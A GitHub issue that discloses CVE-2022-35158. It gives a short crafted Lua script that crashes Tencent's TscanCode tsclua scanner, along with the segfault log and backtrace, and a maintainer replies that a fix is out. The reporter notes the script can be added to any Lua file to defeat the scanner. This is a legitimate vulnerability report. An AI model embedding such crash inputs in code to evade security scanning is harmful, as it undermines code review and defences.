Headline
CVE-2022-35158: TscLua 崩溃 · Issue #65 · Tencent/TscanCode
A vulnerability in the lua parser of TscanCode tsclua v2.15.01 allows attackers to cause a Denial of Service (DoS) via a crafted lua script.
构造的 lua 文件如下所示,也可以将其加到任意 lua 文件中,用于对抗扫描器:
function test(a)
local result = false
if result then
if a[0] == "A" then
result = true
print("A")
else
print("B")
end
end
if result then
print("C")
else
print("D")
end
end
test({"A", "B"})
正常运行:
$ lua -v
Lua 5.3.3 Copyright (C) 1994-2016 Lua.org, PUC-Rio
$ lua test.lua
D
崩溃:
$ ./tsclua test.lua
tokenize...
[tokenize][1/1] /home/firmy/TscLua/test.lua
analyze entry file...
check...
[preRuleAnalyze][1/9] uninitvar
[preRuleAnalyze][2/9] OrTrue
[preRuleAnalyze][3/9] intercall
[preRuleAnalyze][4/9] CheckOther
[preRuleAnalyze][5/9] Style
[preRuleAnalyze][6/9] scope
[preRuleAnalyze][7/9] CheckOther2
[preRuleAnalyze][8/9] logic
[preRuleAnalyze][9/9] CheckGlobalVar
[check][1/1] /home/firmy/TscLua/test.lua
[1] 340431 segmentation fault (core dumped) ./tsclua test.lua
0x41d75c <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> mov rbx, rdi
0x41d75f <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> mov rax, QWORD PTR [rdx+0x20]
→ 0x41d763 <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> mov rcx, QWORD PTR [rax+0x8]
0x41d767 <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> cmp QWORD PTR [rax], rcx
0x41d76a <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> je 0x41d778 <_ZN15CCheckUninitVar25HandleSpecialIfNotRequireEPK5Token+40>
0x41d76c <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> pop rbx
0x41d76d <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> ret
0x41d76e <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> xchg ax, ax
[#0] Id 1, Name: "tsclua", stopped 0x41d763 in CCheckUninitVar::HandleSpecialIfNotRequire(Token const*) (), reason: SIGSEGV
[#1] 0x4220b2 → CCheckUninitVar::HandleIf(Token const*)()
[#2] 0x42748b → CCheckUninitVar::CheckUninitVar()()
[#3] 0x49af81 → LuaCheck::check()()
[#4] 0x4e0bd7 → LuaCheckExecutor::check(int, char const* const*)()
[#5] 0x41afb4 → main()
如果可以,帮忙申请一个CVE,谢谢!
Copy link
Collaborator
** ben620 commented Apr 28, 2022**
构造的 lua 文件如下所示,也可以将其加到任意 lua 文件中,用于对抗扫描器:
function test(a) local result = false if result then if a[0] == "A" then result = true print("A") else print("B") end end if result then print("C") else print("D") end end test({"A", "B"})正常运行:
$ lua -v Lua 5.3.3 Copyright (C) 1994-2016 Lua.org, PUC-Rio $ lua test.lua D崩溃:
$ ./tsclua test.lua tokenize... [tokenize][1/1] /home/firmy/TscLua/test.lua analyze entry file... check... [preRuleAnalyze][1/9] uninitvar [preRuleAnalyze][2/9] OrTrue [preRuleAnalyze][3/9] intercall [preRuleAnalyze][4/9] CheckOther [preRuleAnalyze][5/9] Style [preRuleAnalyze][6/9] scope [preRuleAnalyze][7/9] CheckOther2 [preRuleAnalyze][8/9] logic [preRuleAnalyze][9/9] CheckGlobalVar [check][1/1] /home/firmy/TscLua/test.lua [1] 340431 segmentation fault (core dumped) ./tsclua test.lua 0x41d75c <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> mov rbx, rdi 0x41d75f <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> mov rax, QWORD PTR [rdx+0x20] → 0x41d763 <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> mov rcx, QWORD PTR [rax+0x8] 0x41d767 <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> cmp QWORD PTR [rax], rcx 0x41d76a <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> je 0x41d778 <_ZN15CCheckUninitVar25HandleSpecialIfNotRequireEPK5Token+40> 0x41d76c <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> pop rbx 0x41d76d <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> ret 0x41d76e <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> xchg ax, ax [#0] Id 1, Name: "tsclua", stopped 0x41d763 in CCheckUninitVar::HandleSpecialIfNotRequire(Token const*) (), reason: SIGSEGV [#1] 0x4220b2 → CCheckUninitVar::HandleIf(Token const*)() [#2] 0x42748b → CCheckUninitVar::CheckUninitVar()() [#3] 0x49af81 → LuaCheck::check()() [#4] 0x4e0bd7 → LuaCheckExecutor::check(int, char const* const*)() [#5] 0x41afb4 → main()如果可以,帮忙申请一个CVE,谢谢!
已更新一个新版本。可以再试试,如果发现新的问题,欢迎反馈